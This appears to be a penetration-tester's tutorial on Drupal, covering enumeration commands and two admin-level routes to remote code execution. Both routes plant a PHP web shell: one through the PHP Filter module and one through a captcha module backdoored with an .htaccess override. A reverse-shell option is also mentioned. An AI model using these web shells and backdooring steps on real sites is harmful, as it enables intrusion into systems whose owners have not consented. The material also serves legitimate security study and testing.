Drupal

Drupal is a robust open-source content management system (CMS) used for building websites and web applications. It is highly flexible, scalable, and secure, making it suitable for blogs, enterprise websites, government portals, and social networks. With a strong modular architecture, Drupal allows extensive customization through modules and themes.

Tech Stack of Drupal

• Backend: PHP (Symfony framework)
• Frontend: HTML, CSS, JavaScript (jQuery, Twig for templating)
• Database: MySQL, MariaDB, PostgreSQL, SQLite
• Server: Apache, Nginx

File Structure

/drupal-root
│── core/              # Drupal core files (framework, APIs, libraries)
│── modules/           # Contributed and custom modules (extend functionality)
│── themes/            # Installed themes (controls site design and layout)
│── sites/             # Site-specific configuration and files
│   ├── default/       # Default site configuration (settings.php is critical)
│   ├── all/           # Modules and themes shared across multiple sites
│   ├── example.com/   # Site-specific configurations for multi-site setups
│── profiles/          # Installation profiles (predefined configurations)
│── libraries/         # Third-party libraries used by modules or themes
│── vendor/            # Composer-managed dependencies
│── scripts/           # Scripts for automation and maintenance
│── web.config         # IIS web server configuration
│── .htaccess          # Apache server configuration (security and performance rules)
│── index.php          # Main entry point of Drupal
│── autoload.php       # Composer autoloader for PHP classes
│── robots.txt         # Controls search engine crawling behavior
│── README.txt         # Default file that may expose version info (security risk)
│── settings.php       # Database credentials & security settings (critical target for attackers)
│── services.yml       # Service container configuration
│── default.settings.php # Default configuration file (should be secured)
│── install.php        # Installation script (should be removed after setup)
│── update.php         # Script to run database updates
│── .gitignore         # Git ignore rules for development
│── LICENSE.txt        # Drupal license information
│── CHANGELOG.txt      # Version history and updates

---

Enumeration

## Verify The Web is based on Drupal
curl -s http://site.rezydev.xyz/ | grep Drupal

## Version Enumeration
curl -s http://site.rezydev.xyz/CHANGELOG.txt
## Note: New version of  Drupal don't allow us to read CHANGELOG.txt and README.txt.

## Scan Drupal for Themes, Plugins, Versions, Interesting URLs, etc...
droopescan scan drupal -u http://site.rezydev.xyz/

---

Exploitation

PHP Filter Module

In older versions of Drupal (before version 8), administrators could enable the PHP Filter module, which allowed embedded PHP code/snippets to be evaluated directly within content. This created an opportunity for attackers to execute arbitrary PHP code and gain Remote Code Execution (RCE).

Exploitation Steps

Before Version 8

1. Log in to Drupal as an administrator.

2. Navigate to Admin > Modules and enable the PHP Filter module.

   • Go to Configuration > Content authoring > Text formats and editors, and ensure that "PHP code" is selected under the Text format dropdown.
   • Save the configuration.

3. Go to Content > Add content and create a Basic page.

4. Insert a malicious PHP snippet, like:

   <?php system($_GET['cmd']);?> ## OR pentestmonkey/php-reverse-shell

5. Set the Text format dropdown to PHP code and save the page.

6. Once saved, you will be redirected to the new page.

7. Execute commands via the browser or use cURL to request a command like:

   http://site.rezydev.xyz/node/3?cmd=id
   
   http://site.rezydev.xyz/node/3 ## just visit if  
   ## there is reverse-shell script and catch shell using netcat  

From Version 8 Onwards

From version 8 onwards, the PHP Filter module is no longer installed by default. If you wish to leverage this functionality, you would need to install the module manually:

1. Download the module from the Drupal website:

   wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

2. Navigate to Admin > Reports > Available updates (or Extend in some versions).

3. Click Browse, select the downloaded module file, and click Install.

4. Once installed, create a new basic page, similar to the process in Drupal 7, and use the PHP code text format to insert the malicious code.

Backdooring a Module

Drupal allows users with appropriate permissions to upload and install new modules. An attacker with administrative or compromised credentials can create a backdoored module by adding a web shell to an existing module and uploading it to the site.

Exploitation Steps

1. Download a legitimate Drupal module from the Drupal website.

   wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz  
   tar xvf captcha-8.x-1.2.tar.gz  

2. Create a PHP web shell inside the extracted module folder:

   <?php system($_GET['cmd']);?>

3. Since Drupal denies direct access to the /modules folder, create a .htaccess file to override restrictions:

   <IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   </IfModule>

4. Move the shell and .htaccess file into the module directory and create a new archive:

   mv shell.php .htaccess captcha/  
   tar cvf captcha.tar.gz captcha/

5. As an administrator, navigate to Manage > Extend and click on + Install new module.

6. Upload and install the backdoored captcha.tar.gz archive.

   • Example installation page: http://site.rezydev.xyz/admin/modules/install

7. Once installed, execute commands by browsing to:

   http://site.rezydev.xyz/modules/captcha/shell.php?cmd=id

---

Some Known Vulnerabilities

• CVE-2014-3704 - Drupalgeddon
• CVE-2018-7600 - Drupalgeddon2
• CVE-2018-7602 - Drupalgeddon3